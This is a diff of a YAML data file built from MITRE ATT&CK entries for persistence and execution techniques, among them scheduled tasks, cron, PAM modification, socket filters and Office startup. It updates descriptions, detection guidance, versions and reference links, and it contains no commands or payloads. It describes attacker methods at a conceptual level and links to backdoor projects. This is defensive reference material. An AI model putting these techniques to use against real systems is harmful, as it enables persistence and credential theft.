@@ -27222,8 +27603,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -27232,6 +27613,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27244,29 +27629,29 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -27313,7 +27698,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -27345,8 +27730,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27360,6 +27745,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27372,16 +27761,19 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -27444,7 +27836,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -27509,49 +27900,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27566,20 +27918,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1574.007:
@@ -27669,7 +28058,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -27757,7 +28145,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -27842,11 +28229,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27924,7 +28310,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1546.006:
@@ -27957,7 +28342,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27980,11 +28365,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -28042,9 +28426,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1542.001:
@@ -28125,12 +28508,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -28149,7 +28531,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -28163,7 +28544,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -28190,8 +28570,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -28222,7 +28602,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -28279,11 +28660,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28355,9 +28735,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28373,12 +28753,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28453,7 +28832,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1542.005:
@@ -28496,7 +28874,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28520,8 +28898,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -28676,31 +29052,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28717,6 +29073,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -28727,9 +29084,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -28737,17 +29098,37 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -28755,79 +29136,73 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
